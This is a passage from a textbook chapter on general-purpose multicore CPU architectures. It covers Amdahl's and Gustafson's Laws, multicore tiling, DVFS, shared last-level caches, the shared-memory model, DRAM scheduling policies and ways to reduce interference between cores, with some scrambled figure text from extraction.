of time to finish, and the operating system uses round-robin scheduling to switch
between each of the programs, the programs will take 10× longer to complete than
if they ran uninterrupted. Second, in real-world machines, the execution time of each
program is further increased by the overhead of context switching. When a program
is switched out, its registers (and for some machines, dirty cache values) must be
saved somewhere, and these values must be restored when the program is switched
back in.
As a natural progression toward concurrent execution without these overheads,
researchers began to explore whether a computer could incorporate multiple CPUs,
where the CPUs have the ability to communicate with each other. (Alternative
techniques such as multithreading were also being developed around this time,
with 1960’s Bull Gamma 60 (Dreyfus 1958) and Honeywell 800 (Minneapolis–
Honeywell DATAmatic Division 1960) being two early examples of hardware
multithreading support. A constrained version of multithreading was implemented
in the DYSEAC in 1954 (Leiner 1952).) This technique, known as multiprocessing,
was first implemented in the Burroughs B 5000 (Longergan and King 1961) and
D825 (Anderson et al. 1962) mainframe computers, released in 1961 and 1962,
respectively. In a computer capable of multiprocessing, multiple programs can
execute simultaneously, without the need to time-share the CPU. An operating
system (OS) typically sees a multi-CPU computer as a single system, and a
multiprocessing-capable OS is responsible for assigning programs to specific CPUs.
Given the high cost of CPUs, many multi-CPU machines still perform time-sharing
on each CPU in addition to multiprocessing, and the OS uses various scheduling
heuristics to determine how best to choose which CPU a program should be
scheduled on.
18 General-Purpose Multicore Architectures 601
1
S= f
(1)
(1 − f ) + n
where f is the fraction of the program that can be parallelized, and n is the number
of concurrent threads that can execute the parallelizable part of the program. To
visualize Amdahl’s Law, Fig. 3 shows an example where f = 0.4 (i.e., 40% of the
program can be parallelized), for various thread counts. As the figure shows, for
602 S. Ghose
every doubling of the thread count, the reduction in total time is only half of the
reduction achieved by the previous doubling.
Figure 4a shows the theoretical parallel speedup achievable according to the law,
for different values of f. A key takeaway from Amdahl’s Law is that even for an
infinite number of concurrent threads (i.e., n = ∞), the maximum speedup S of a
parallel program is bound by the time it takes to execute the part of the program that
is not parallelizable. While Amdahl’s Law encompasses key properties of parallel
execution, it has two important limitations.
First, Amdahl’s Law does not explicitly account for the additional overhead of
synchronization primitives. As more threads execute concurrently, the contention
for acquiring mutually exclusive access to a portion of shared memory can increase.
For example, if all of the threads of a parallel program share and update a single
counter, they must use a mutual exclusion primitive (i.e., mutex) to ensure that
updates from one thread are not inadvertently lost by another thread. This requires
each thread to acquire the mutex whenever it updates the counter, and other threads
that attempt to acquire a mutex that is currently held by another thread will stall. As
more threads execute concurrently, the likelihood increases that more threads will
contend at the same time to acquire the mutex, introducing more stalls. In practice,
these synchronization overheads from mutex contention (as well as interference
between threads due to resource sharing; see “Sharing Caches and Main Memory”)
can make it such that adding a parallel thread can actually decrease the parallel
speedup, as shown in Fig. 5.
Second, Amdahl’s Law assumes that the problem size is fixed regardless of the
number of parallel threads. In reality, the number of threads used to parallelize a
program is typically linked with the number of available CPUs. For a multiprocess-
ing machine, when there are more CPUs, a program has more resources available
18 General-Purpose Multicore Architectures 603
Speedup
1.0 32 226
32 252 254 256 f=0.1
4 32 256 16
16
8 f=0.9 8
4 4 f=0.01
f=0.5 2
2
f=0.1 1
1 f=0.01 1 2 4 8 16 32 64 128 256
1 2 4 8 16 32 64 128 256
Number of Threads Number of Threads
Fig. 4 Comparison of theoretical parallel speedup estimated by Amdahl’s Law and Gustafson’s
Law, for different parallelizable fractions f . Inset graphs show a zoomed-in section of the main
graph for clarity. (a) Amdahl’s Law. (b) Gustafson’s Law
to it, such as memory capacity. As a result, programmers and/or users can increase
the problem size to take advantage of these extra resources. Since Amdahl’s Law
does not capture the impact of these extra resources, it can provide a pessimistic
estimate of the capabilities of a multi-CPU machine. Gustafson’s Law (Gustafson
1988) accounts for this, by calculating the parallel speedup S as
S = (1 − f ) + f × n (2)
Figure 4b shows the predicted speedups from the law, to provide a comparison to
Amdahl’s Law.
Real-world parallel system performance deviates from both Amdahl’s Law
and Gustafson’s Law. For example, while one could treat Gustafson’s Law as an
optimistic upper bound on performance, real machines can sometimes outperform
the estimated parallel speedup from Gustafson’s Law due to data sharing. If one
thread brings data into a shared memory that is subsequently used by a second thread
(exploiting temporal and/or spatial locality across threads), the second thread no
longer pays the memory latency required for that subsequent data access (assuming
that the data is not evicted). This phenomenon is an example of superlinear speedup.
Putting this all together, Fig. 5 shows a synthetically constructed example of the
parallel speedup one could expect to observe on a real parallel system. The example
assumes that 99% of the application can be parallelized across all threads, while the
remaining 1% must execute sequentially. It also assumes that the machine has 32
CPU cores, and since it has a fixed set of available resources, Amdahl’s Law can be
used to predict performance. There are three observations from the figure. First, even
with a single thread, the observed speedup is less than 1. This is because parallel
speedup is compared against the best sequential implementation (see “Evaluating
Multicore CPUs”), and a parallel implementation (with a configurable parameter n
that sets the thread count) typically has overheads associated with adding code to
support parallel execution, and these overheads are observed when n = 1. Second,
superlinear speedups can even exceed perfect parallelism. As mentioned above,
this is the result of threads helping each other through data locality. Third, after
604 S. Ghose
Speedup
0 1 2
Amdahl’s Law), the dashed 16
line shows expected Slowdown
12
performance (f = 0.99 with
8
Amdahl’s Law), and the solid
line shows observed 4
performance 0
0 4 8 12 16 20 24 28 32
Number of Threads
a certain thread count (24 in our example), the performance at a higher thread count
is actually lower than the performance at a lower thread count. This is because
the benefits of additional thread-level parallelism and additional data locality are
overcome by synchronization and interference overheads.
Note that while Fig. 5 is one example of parallel application behavior, its trends
are not universal. As one example, some applications exhibit what is known
as embarrassingly parallel behavior (Mattson et al. 2004), where an application
continues to achieve near-ideal parallel speedup even at high thread counts, due to
limited need for synchronization and serialization.
Through the 1990s (and drawing some very broad, and likely inaccurate, gen-
eralizations), the vast majority of parallel computing architectures catered to the
large-scale computing market, with much of the effort focused on supercomputers.
Most personal computers (PCs) and workstations incorporated only a single-core
CPU (or in the case of some high-end workstations, multiple single-core CPUs
installed on a multi-socket motherboard). (At that time, there was a distinction
between more mainstream PCs and high-performance workstations that targeted
power users. Today, in large part due to advancements in PC capabilities throughout
the 1990s, this distinction has mostly disappeared, but the chapter references it
here for historical context.) Much of the focus on architectural innovation remained
on improving the performance of the single core, leading to the maturation and
widespread commercial adoption of techniques such as out-of-order processing and
superscalar execution.
Concurrently, several architects started envisioning a new direction of CPU
design. In the early 1990s, with no immediate end in sight to Moore’s Law and
Dennard Scaling, a number of works speculated that with millions of additional
transistors becoming available on a chip within the next decade, it would now
be feasible to replicate multiple CPU cores within a single chip. This concept
came to be known as a single-chip multiprocessor (which ultimately led to the
18 General-Purpose Multicore Architectures 605
While the term multicore CPU may lead one to think that there are significant
additions at a microarchitectural level to enable parallel execution, the central design
of the cores is often (but not always) simpler than the most aggressive single-
core CPU microarchitectures released by manufacturers. In fact, the majority of
the critical hardware changes to enable multicore CPUs lie outside of the CPU core.
A central tenet of multicore CPU design is that performance can be attained through
parallelism and repetition, as opposed to design complexity.
Figure 6 shows a typical example of the major components found in a multicore
CPU. Two or more CPU cores sit within the same chip package, with each core
having its own (i.e., private) L1 instruction, L1 data, and unified L2 caches. All of
the cores have shared access to a single last-level cache (LLC). The LLC connects
with one or more on-chip memory controllers, which provide access to off-chip
DRAM modules in the system.
Multicore CPU designers prevent the design and verification of the CPU from
increasing linearly with the core count by relying on design reuse through tiling. In a
homogeneous multicore CPU, the design of the cores is identical, in order to reduce
manufacturing and verification/testing costs. (The section titled “The Evolution of
Multicore CPUs” discusses popular approaches for heterogeneous multicore CPU
design.) Figure 6 shows how the majority of the chip for a typical homogeneous
18 General-Purpose Multicore Architectures 607
tile
per-core, private
L1I SRAM L1D SRAM L1I SRAM L1D SRAM
L2 Cache L2 Cache
SRAM SRAM
to off-chip DRAM
to off-chip DRAM
Controller
Controller
Memory
Memory
Shared Last-Level Cache
(L3 Cache)
SRAM
L2 Cache L2 Cache
SRAM SRAM
multicore CPU is made up of multiple tiles, where each tile has exactly the same
components. A tile usually consists of a single CPU core and the private caches
associated with that core. Some architectures include a slice of the last-level cache
in the tile (see the section titled “Sharing Caches and Main Memory”). In addition
to these tiles, the chip includes shared components (e.g., controllers that connect the
CPU cores to external components, interconnects).
To enable multiple tiles to be stamped out without incurring an exorbitant
increase in chip area compared to a powerful single-core CPU, the CPU core within
the tile is significantly simplified. As an example, the Core 2 Duo, the second line
of desktop multicore CPUs by Intel (and the first whose microarchitecture was
designed with dual-core processing in mind), was not based off of the then-state-of-
the-art NetBurst microarchitecture (Boggs et al. 2004) that formed the basis of the
Pentium 4. Instead, it utilized a new microarchitecture known as Core, which was
based on the mobile-oriented Pentium M variant of the P6 microarchitecture (Hinton
2010), with roots spanning back to the mid-1990s.
When the CPU is unable to achieve peak throughput, significant energy is wasted
by running the CPU at its full voltage and frequency. The dynamic power Pdyn
consumed by a CPU to execute a program can be modeled as a function of its supply
voltage (V ) and frequency (f ):
Pdyn ∝ α × C × V 2 × f (3)
where α is an activity factor, and C is the switched load capacitance of the CPU’s
transistors. Over time, if the CPU continues at full dynamic power during periods
of underutilization, a large amount of energy is wasted. DVFS techniques can detect
when the CPU is stalling or being underutilized and reduce the supply voltage and/or
the clock frequency of the CPU.
One limitation of DVFS is Vmin , the minimum operating voltage of the CPU core.
A lower bound on Vmin is the threshold voltage of a transistor, which is the minimum
voltage at which the transistor effectively operates as a digital switch. The threshold
voltage is a function of the manufacturing process technology. Practically, though,
Vmin is notably higher than the threshold voltage, in order to ensure the reliable
18 General-Purpose Multicore Architectures 609
operation of the CPU. Between the nominal operating voltage (Vdd ) and Vmin , DVFS
lowers the voltage of the selected CPU core. As the voltage is linearly correlated
with the CPU core frequency, this results in a cubic reduction in dynamic power,
based on Eq. 3. Once DVFS reaches Vmin , it can continue to lower the frequency
but must leave the voltage at Vmin , resulting in a linear reduction in dynamic power.
Figure 7 shows this relationship for a hypothetical CPU, with a base frequency of
4.0 GHz at a TDP of 88 W, Vdd = 1.2 V, Vmin = 1.0 V, and a turbo boost frequency
of 4.4 GHz.
Given that each core in a multicore system has the ability to execute a different
thread or workload from the other cores, it is inefficient to manage DVFS settings
at a global level. However, early approaches to DVFS relied on large off-chip
switching voltage regulators, which each consumed significant area and power and
which had response times on the order of tens of microseconds. Within a few years
of the introduction of DVFS in commercial systems, on-chip voltage regulators were
developed. These on-chip regulators, often called buck converters (Kim et al. 2008),
are capable of performing sub-100 ns voltage switching, at >90% efficiency. Due
to their low cost and fast response, buck converter-based DVFS is now widely used
in multicore CPUs, where each CPU core has its own on-chip regulator to allow
for per-core DVFS throttling. The voltage and frequency settings for each core
are typically selected in the operating system, using a governor (see the section
titled “Optimizing Operating Systems for Multicore CPUs”).
Reduction
the actual DVFS behavior,
80
while the dotted line shows
idealized further reductions to 60
dynamic power if Vmin was
not a lower limit to voltage No Voltage
40
scaling. Reduction
20
0
0.0 0.5 1.0 1.5 2.0 2.5 3.0 3.5 4.0 4.5
CPU Frequency (GHz)
610 S. Ghose
core CPUs. For example, in the single-core model, the cache hierarchy should
ideally provide enough cache capacity to handle common workloads that exhibit
large cacheable data footprints (e.g., workloads with memory access patterns that
exploit spatial and/or temporal locality across multiple megabytes of data).
In a multicore CPU, the ability to share (i.e., pool together) resources across
multiple cores can allow us to support near-worst-case behavior for a subset of
cores (e.g., if one core runs a worst-case workload) while keeping total resource
allocation at a more modest level. Returning to the cache capacity example, while
a multicore CPU catering to the worst case (e.g., a situation where each core runs
a large-footprint workload) could potentially require several megabytes of cache
capacity per core, multicore designers instead reduce the per-core amount of cache
in the CPU and instead allow cores to share much of their cache capacity with each
other. The two most prominent examples of resource sharing in a multicore CPU
are in the memory hierarchy: the last-level cache (LLC) and main memory.
One issue with sharing resources across CPU cores is interference (Bitirgen et al.
2008), where due to the finite amount of available resources, multiple cores may
contend with each other for their desired share of these resources. Let us look at a
contrived example, with a two-core CPU, where one core is servicing a cache miss
that must retrieve data from main memory. As the data for that miss arrives at the
LLC, the LLC must evict an existing cache block (assuming that no invalid blocks
remain). Interference can occur when the eviction is for a cache block belonging to
the other core, as that core will now miss on a subsequent access to the evicted block.
Had the first core not triggered the eviction, this subsequent access would have been
a cache hit, avoiding the long-latency miss to main memory. The resource contention
that results from multicore interference can hurt the effective performance and
energy consumption of the CPU (the section titled “Evaluating Multicore CPUs”
discusses metrics to quantify this impact). As a result, several approaches have been
proposed to mitigate interference in the memory hierarchy (see section “Mitigating
Interference”).
In order to accommodate the needs of all of the cores in the multicore CPU, the
LLC tries to reduce the potential for set contention and the associated invalidations.
18 General-Purpose Multicore Architectures 611
First, the LLC is significantly larger (e.g., on the order of multiple megabytes,
reaching tens of megabytes for large contemporary multicore CPUs) than the typical
LLC capacities from the single-core era (e.g., the L2 caches of that era, then the
LLC of the CPU, were only hundreds of kilobytes in size). Second, the LLC has
notably higher associativity, with modern CPUs implementing 24-way and 32-way
set-associative caches. While this significantly increases the area of the LLC, with
some multicore CPUs using as much as half of their total die area for the LLC,
the increases are amortized across all of the cores (as compared to increases in the
private cache area).
To work around capacity and port limitations, modern caches rely on the concept
of cache slicing, where a cache level is decomposed into multiple smaller pieces.
(Cache slicing has been referred to by several terms over the years, including cache
interleaving and cache multibanking. Early works on cache interleaving date to
1980 (Smith 1982) and initial implementations interleaved (i.e., distributed) the
words within a single cache block across multiple cache banks. This chapter uses
the term cache slicing to refer to cache block interleaving across cache slices/banks,
where a single slice/bank contains the entire cache block (Sohi and Franklin 1991).)
Each cache slice contains a subset of the total number of cache sets in the level
and is further partitioned by the number of ways. The slicing requires each cache
access to first go through a slice decoder to identify which slice to look up. While
early slice decoder implementations used a subset of the cache block address bits
(e.g., using two of the cache index bits to decide which of four slices the block
is assigned to), several commercial CPUs employ complex hash-based set mapping
functions (e.g., Lempel 2011) to avoid hotspots (i.e., the uneven distribution of cache
accesses across slices).
Inside a slice, to further manage scalability, the slice is typically partitioned into
a tag store (i.e., a tag directory, which stores metadata about each cache block in the
slice) and a data store (i.e., the actual data inside each cache block). While tag–data
partitioning is an independent concept from cache slicing, it also helps to reduce
cache energy by not activating the data bitlines unless a cache hit occurs (albeit at
the expense of increased latency due to serializing the tag and data lookups). Note
612 S. Ghose
that for very large caches, the data store of a cache slice can be further partitioned
into multiple two-dimensional subarrays of SRAM (Huang et al. 2013), to further
reduce power consumption.
There are two general approaches to laying out the shared LLC on a multicore
CPU chip, both of which support cache slicing. As mentioned in the section
titled “Optimizing CPU Cores for Parallelism,” a multicore CPU is made up of
multiple tiles, where a tile includes a CPU core and its private caches. The first
approach for LLC layout allocates a fixed amount of cache outside of these tiles,
as shown in Fig. 8a, using a separate tile for the LLC. Often with this layout, the
controller for the LLC is centralized, and each core has access to the cache controller
via a bus (i.e., a shared wire across all cores), though some implementations
maintain an independent controller for each cache slice, in which case a crossbar is
used. The second approach for LLC layout includes a slice of the LLC with each
CPU core tile, as shown in Fig. 8b (leading to a one-to-one correspondence between
core count and cache slice count). With this layout, each cache slice typically
maintains an independent controller, and the controllers are connected together
using a ring interconnect (Lempel 2011; Huang et al. 2013).
A key challenge with large LLCs is access time. Conventionally, monolithic
caches provide uniform cache access, where all cores can access any block in the
cache with the same latency (assuming no interference). As LLCs have become
larger and sliced, cores often deal with non-uniform cache access (NUCA) (Kim
et al. 2002), where it can take a longer time for a core to access a remote slice (i.e.,
the additional time required to traverse the interconnect) than it does to access its
local slice. A NUCA cache can incur higher latencies than a cache with uniform
a Tile b Tile
CPU Core CPU Core CPU Core CPU Core CPU Core CPU Core CPU Core CPU Core
L1I L1D L1I L1D L1I L1D L1I L1D L1I L1D L1I L1D L1I L1D L1I L1D
CPU Core CPU Core CPU Core CPU Core CPU Core CPU Core CPU Core CPU Core
Fig. 8 Two approaches to tiling a multicore CPU layout. Note that tiles on the bottom row are
intentionally shown upside down to represent the stamping of identical tiles. (a) Tile without a
piece of the LLC. (b) Tile containing an LLC slice
18 General-Purpose Multicore Architectures 613
cache accesses, but the slicing enables additional bandwidth by allowing concurrent
accesses to each slice, mitigating some of the performance loss.
For a given mix of workloads, a multicore CPU with n cores can potentially
issue cache misses to main memory at as much as n times the rate that a single-
core CPU does (note that this assumes similar core architectures in both CPUs and
depends heavily on the specific workloads and on the impact of cache interference
between cores). This requires the main memory to scale up its ability to respond
to these cache misses, and modern memory subsystems have two examples of this.
First, more MSHRs are provided at the LLC in order to sustain a greater number
of concurrent memory accesses. An LLC miss must stall any time the cache does
not have a free MSHR available to allocate. If there are not enough MSHRs in
the system, then such stalls are more likely to occur. As each cache slice often
has its own set of MSHRs, multicore CPUs take advantage of the increased slice
count to provide more MSHRs at a low cost, compared to scaling up a monolithic
CAM. Second, the memory bandwidth has been scaling up to accommodate the
increased demand. The memory bandwidth provided by DRAM has been increasing
significantly over the last two decades, through a combination of (1) increasing bus
frequencies for the memory channel and (2) the emergence of new DRAM types
such as DDR5 (JEDEC Solid State Technology Assn. 2024) and High-Bandwidth
Memory (HBM) (JEDEC Solid State Technology Assn. 2020). While memory
bandwidth can also be scaled by increasing the number of memory channels per
CPU, multicore CPUs have largely avoided this approach due to the limited number
of pins available in the CPU chip package.
The sharing of a single main memory across multiple cores can introduce new
changes to the behavior of three properties, compared to their behavior with single-
core CPUs. First, the optimal choice of an address interleaving scheme (i.e., which
bits index which memory structures) can change depending on the type of workload
614 S. Ghose
executing on the CPU. Second, the optimal choice of row policy (i.e., whether a
DRAM row is left open after all currently queued requests are serviced) can depend
on the type of workload as well. Third, the memory scheduling algorithm (i.e., the
order in which queued DRAM requests are serviced) may need to change to avoid
starving requests in certain scenarios. The section titled “Main Memory Policies”
discusses each of these in detail.
One key artifact of the memory hierarchy of a multicore CPU is that cores do
not always write updates to globally visible locations. For example, in a typical
multilevel hierarchy that employs write-back caches, a core will write data to its
private L1 data cache, but this updated value will not be immediately visible to
other cores in the CPU, as they cannot directly access another core’s private cache.
This is at odds with the architectural model (i.e., abstraction) that is presented to
programmers, where the cores have access to a global shared memory (which is not
the same as main memory; see “Shared-Memory Model” for more details). As part
of this shared-memory model, a data update written by a core to shared memory
will become visible to other cores. In contrast, caches are a microarchitectural
optimization that is not, in principle, exposed to programmers as part of the
architectural abstraction. (This is in part because (1) caches are designed to be
hardware-managed structures that operate transparently to the programmer and
(2) cache configurations can differ between different CPU models belonging to
the same instruction set architecture. In practice, programmers use knowledge of
the design of the cache hierarchy to optimize program performance, while still
expecting the behavior of the system to adhere to the semantics of the shared-
memory programming model.) As such, any interaction that a core has with a cache
must appear to the program as if it is taking place globally in shared memory, as
this is what a programmer expects.
In order to maintain program correctness, multicore CPU must ensure that data
updates are coordinated across all of the cores (as is the case in any parallel
computer architecture). For the shared-memory programming model typically used
for multicore CPUs, this involves two types of coordination (Nagarajan et al. 2020):
(1) cache coherence, which ensures that updates to a single unit of data (e.g., one
cache block) are made visible to and ordered across all cores, and (2) memory
consistency, which ensures that updates across multiple units of data are interleaved
according to a predetermined policy across all cores. The sections titled “Cache
Coherence” and “Memory Consistency Models” discuss cache coherence and
memory consistency, respectively, in more detail.
While the term multicore does not in theory place any limits on the number of
cores in a CPU, there is a distinction made between multicore CPUs with smaller
18 General-Purpose Multicore Architectures 615
core counts (e.g., under 24 cores in contemporary systems) and manycore CPUs,
which are multicore CPUs that consist of several dozens of cores. This distinction is
made because of key scalability challenges that become prominent as the core count
increases significantly. For the smaller core counts, the interconnects described
in the section titled “Sharing Caches and Main Memory” can enable reasonable
parallel performance. However, at the manycore level, the significant increase in
contention makes both bus-based and ring-based interconnects infeasible. As a
result, specialized research and development has focused on how to provide more
scalable communication at high core counts.
The initial ideas that would evolve into manycore CPU design stem from the
Raw microprocessor project at MIT (Waingold et al. 1997). Conceived around the
same time as the Hydra CMP (see “What to Do With All These Transistors?”), the
Raw CPU took a more extreme approach to CPU core simplification, arguing that
sophisticated compilers could offload the need for complex ILP mechanisms. As a
result, the Raw CPU consisted of multiple small tiles, where each tile included a
very simple CPU core along with a small piece of cache. The tiles were meant to be
composable: Depending on the needs of a platform and on the available transistor
count, a manufacturer could stamp out more or fewer tiles depending on their
needs. By making each tile small, the distance between tiles (and, thus, the distance
between cores) and intra-tile wire lengths would both be short, allowing for the CPU
to run at a faster clock frequency without excessive power consumption. To enable
composability with varying tile counts, the tiles connected to each other using a
packetized mesh network (a two-dimensional interconnect), including configurable
on-chip routers. The first Raw CPU, prototyped in 2002, included 16 tiles on a single
chip.
Unfortunately, there is no precise definition of a core count or of specific
properties that a manycore CPU must have, and the perceived distinction between
manycore CPUs and more conventional multicore CPUs has shifted as capabilities
have evolved over the last two decades. Aside from mesh-based tile organizations,
other properties observed in several manycore CPUs include non-uniform cache
access (NUCA) architectures with multiple cache slices and the replacement of
hardware cache coherence with software-driven message passing interfaces. While
not a comprehensive list, examples of commercial CPUs that have been considered
to be manycore include the Tilera TILE 64 (a commercialization of the MIT Raw
CPU), the Intel Xeon Phi series, and various CPUs from PEZY, including their 2048-
core PEZY-SC2 released in 2017.
Managing Memory
The cores in a multicore CPU share memory with each other, as discussed in
the section titled “Sharing Caches and Main Memory.” This sharing introduces a
number of issues that must be considered by both programmers and architects. This
section will discuss several of these issues. To start, it defines what it means to share
memory, both from a software perspective and from a hardware perspective. Then,
616 S. Ghose
L1I L1D
... L1I L1D
L2 Cache L2 Cache Row Buffer
Shared-Memory Model
From the first symmetric multiprocessor computer, the Burroughs D825 (Anderson
et al. 1962), the majority of multiprocessor systems have enabled CPU cores to share
the physical main memory with each other. Through the decades, to mitigate the
long latencies of memory, several microarchitectural enhancements (e.g., caches,
memory speculation) have extended the memory subsystem hardware but have done
so transparently to the programmer. From the programmer’s perspective, multicore
CPUs predominantly make use of a shared-memory model, which at a high level
resembles primitive computers. In the shared-memory model, each core has access
to a single shared physical memory (which may be implemented in a centralized or
a distributed manner). When any core performs a store to an address in this single
shared memory, the update becomes visible to all cores that subsequently load from
that address. While in principle the shared-memory model sounds simple, it has
two key implications on the design of multiprocessor systems (and, by extension,
multicore CPUs).
First, for a core, one needs to define when a store is considered to be performed
(i.e., the moment at which the stored value becomes visible to other cores). For
example, for an out-of-order core, a popular definition is that a store is performed
once the store instruction is committed. Prior to commit, there are several events that
can cause an executed store to be squashed (e.g., exception, misspeculation), making
the commit event the earliest time that the store is guaranteed to safely proceed. As
a result, stores are buffered inside the core, and the store operation to the first-level
cache is not initiated until after the store instruction commits. A physical store buffer
(sometimes called a write buffer) contains all committed writes that are yet to be
issued to the cache. Depending on the memory consistency model, this store buffer
may or may not be considered a part of shared memory; if it is, the store values in
the buffer must be made available to other cores in a way that does not violate the
consistency model (see “Memory Consistency Models” for more).
Second, the CPU must ensure that microarchitectural optimizations for memory
operations obey a consistent set of rules, which are part of the instruction set
architecture (ISA), so that programmers do not encounter program correctness
issues during execution. All private and shared caches are considered part of the
shared memory, which means that cache coherence is needed to propagate the value
of a cache store to other caches and cores, as the section titled “Cache Coherence”
discusses. Both within a thread and across threads, the interleaving of a store
with other stores and with loads must obey a set of rules that are promised to
the programmer, which are defined as part of the memory consistency model. As
“Memory Consistency Models” discusses, some memory consistency models have
strict interleaving expectations, which can simplify programming complexity at the
expense of high performance overheads, while more relaxed memory consistency
models can allow different cores to observe different interleavings (following a
defined set of guarantees) in order to improve performance.
618 S. Ghose
As discussed in “Sharing Caches and Main Memory,” there are three types of
policies for main memory management that are impacted by the introduction of
multiple cores: address interleaving, row policy, and memory scheduling. Each of
these policies is implemented inside the memory controller. Unlike the single-core
case, where the choice of policy for each type can be determined by analyzing
program behavior, the nondeterminism that exists for shared-memory interactions
in a multicore CPU makes it difficult to easily choose a single optimal policy.
Figure 10 illustrates two common interleaving schemes that optimize locality and
MLP over a basic approach without interleaving. In the first scheme, cache block
interleaving, consecutive cache blocks in the memory address space are distributed
to different banks (and in some cases to different memory channels) to allow
requests to the two blocks to be serviced concurrently. In the second scheme, row
interleaving, consecutive cache blocks stay in the same row to maximize hits to the
already-open row, but consecutive rows are distributed to different banks/channels.
While cache block interleaving is a popular scheme for single-core CPUs, it
can introduce issues in a multicore CPU. For example, with a multiprogrammed
workload (i.e., when multiple cores are executing threads that belong to different
processes), one thread may tie up many channels at the same time by accessing
several consecutive cache blocks. This would increase the chance of interference
for any of the other threads trying to access data in memory, by increasing the
likelihood that the channel will be busy. Worse off, if two different processes
access several consecutive cache blocks, this can generate a large number of bank
conflicts (i.e., row conflicts) in DRAM that could have been avoided with a row
interleaving scheme. A non-interleaved memory (i.e., where consecutive rows map
to the same bank) can reduce the probability of bank conflicts due to interference,
but at the expense of sacrificing memory-level parallelism for memory-intensive
applications.
18 General-Purpose Multicore Architectures 619
A B C D A E B F A B C D E F G H
E F G H
C G D H
Fig. 10 Example of how address interleaving schemes impact the placement of cache blocks in
main memory, for a series of cache blocks that are consecutive in the physical address space. A
specific interleaving scheme is chosen by determining which bits of the physical memory address
are used to index the different levels of the memory hierarchy (in this example, the channel, the
bank, the row, and the column)
Row Policy The row policy (Balasubramonian 2019) determines whether a row
in a bank should remain open once the memory controller services all currently
queued requests for that bank. In an open-row policy, the row stays open in case
future memory requests also access the same row (due to spatial locality), avoiding
the latency of reopening (i.e., reactivating) the row when the next request to the
bank arrives. In a closed-row policy, the row is closed as soon as the currently
queued requests for that bank are completed, under the assumption that new
requests are likely to access a different row, thus avoiding the row closing (i.e.,
precharging) latency when the next request to the bank arrives. Variations of these
policies exist, such as timeout policies that close the row a given number of cycles
after the last queued request is serviced. In a multicore CPU, the optimal policy
choice can depend on the workload executing on the CPU. For example, with a
multiprogrammed workload, the likelihood of the next access to the bank being
to the same row decreases compared to a single-core CPU, due to interference
and competition across different processes. However, with a multiprogrammed
workload, the likelihood can potentially increase instead, as multiple threads
belonging to the same process may each access data in the same row, depending
on how data accesses are partitioned across threads.
practically limits a bank to servicing at most one request at a time). This results
in significant complexity for scheduling memory requests, as the controller must
consider many factors such as the time a request has been waiting for, whether
the target bank for each queued request is idle or is in the middle of servicing
another request, and whether the target bank has the target row currently open (i.e.,
activated). Furthermore, while a memory controller can take advantage of bank-level
parallelism (BLP) to service requests to different banks concurrently, the physical
bus wires of the memory channel are shared across all banks belonging to the
channel, as shown in Fig. 9. As a result, the scheduler must also stagger requests
in a way that ensures exclusive access to the memory channel bus for only one
bank, when the bank needs to send data to or receive data from the controller.
Figure 11 shows how this staggering of memory requests can be coordinated for two
examples: (1) when multiple requests target different rows in the same bank (i.e.,
a bank conflict) and must serialize the opening of each row and (2) when multiple
requests target different rows in different banks, which can exploit BLP to overlap
multiple row openings and must serialize only the actual data transfer on the shared
memory channel’s data bus.
Fig. 11 Scheduling of multiple read requests when a bank conflict occurs (top) and when there
is bank-level parallelism that avoids a bank conflict (bottom). The notation Bb Rr Cc indicates a
memory access to Bank b, Row r, and Column c. This example assumes that all requests access
the same memory channel. The memory controller for the channel sends a request to the memory
via the address bus just before it is safe to initiate the operation inside memory (e.g., opening a
row). The controller must ensure that operations to the same bank do not overlap and data transfers
from memory to the controller on the shared data bus do not overlap
18 General-Purpose Multicore Architectures 621
Technology Assn. 2024) and HBM (JEDEC Solid State Technology Assn. 2020)).
A commonly implemented algorithm is known as first-ready, first-come first-serve
(FR-FCFS) (Rixner et al. 2000), which prioritizes requests to already-activated rows
over older requests. FR-FCFS does this to improve average memory access time
(AMAT), as the time required to activate a row, and to precharge (i.e., close) the
row after requests are finished, can both take as long as the read and write requests
themselves (JEDEC Solid State Technology Assn. 2024). Memory controllers in
commercial multicore CPUs continue to use FR-FCFS without introducing any
notion of thread or application awareness (Balasubramonian 2019), which can
exacerbate interference across threads (see “Mitigating Interference”).
Mitigating Interference
The combination of private caches and shared caches attempts to balance the impact
of interference with the need to provision resources for worst-case behavior: Private
caches allow each CPU core to manage a small working set of its data without first-
order impacts of interference, while the shared cache enables resource pooling to
reduce the frequency of long-latency misses to main memory for workloads with
large data footprints. However, it is still possible for memory interference, at the
caches and/or at main memory, to negatively impact one or more cores. This section
looks at three such examples, as well as potential mechanisms to mitigate them.
Our first example examines how cache requests from one core can impact the
management of a private cache belonging to a different core. If the shared LLC is
inclusive of upper-level private caches and one core evicts a cache block from the
LLC belonging to a second core, the second core will also have to evict that cache
block from its private caches even though the private cache space is not being used
by the first core. To address this (as well as pollution from hardware prefetchers),
some multicore CPUs employ a noninclusive or exclusive policy for the LLC or for
the last private cache level (Backes and Jiménez 2019). On a miss to main memory,
the noninclusive policy acts like the inclusive policy, where a copy of the data is
placed in the LLC and in the private cache(s). When a cache block eviction takes
place at the LLC, the noninclusive policy acts like the exclusive policy, where the
eviction does not trigger an eviction in the upper-level private caches.
Our second example examines how shared cache utilization by one core can
impact the available shared cache capacity, and thus the performance, for a different
core. In a conventional multicore CPU, shared resources are left unmanaged, i.e.,
there is no active mechanism to enforce that each core receives a fair portion of the
resources. This unmanaged approach is often useful to allow the easy distribution
of these resources across cores based on the heterogeneous needs of the threads
that each core is executing (e.g., in a two-core CPU, one core runs a thread that
has a large working set and uses up most of the LLC, while the other core runs a
thread that has a small working set and can make do with whatever capacity the first
thread does not use). However, when the heterogeneous needs are more extremely
unbalanced, one or more of the threads may incur significant slowdowns. In our
622 S. Ghose
example, if one greedy thread is using most of the LLC, cache blocks belonging
to other threads may constantly be evicted, hurting those threads’ performance
significantly. To address this, several works have proposed cache partitioning, where
some or all of the ways and/or sets of a cache are assigned to a specific core or
thread. Strict cache partitioning could ensure that the cache blocks from the other
threads in our example do not get evicted, as the greedy thread would not be allowed
to use partitions belonging to other threads. One commercial implementation of
cache partitioning is Intel’s Cache Allocation Technology (Herdrich et al. 2016).
Our third example examines how memory scheduling algorithms can introduce
unintentional slowdown for threads. Recall from “Main Memory Policies” that the
commonly used FR-FCFS scheduling algorithm does not account for any sort of
thread or application awareness and solely focuses on reducing the number of
row activations and precharge operations. While reducing activate and precharge
operations help decrease the AMAT for a thread that can exploit row locality, they
can unfairly slow down the other threads in a multicore CPU, by continuing to
prioritize requests from the thread whose row is already activated. In this example,
one thread is generating many loads and stores to the same DRAM row, which is
currently activated, while the other threads each have a single load that is waiting
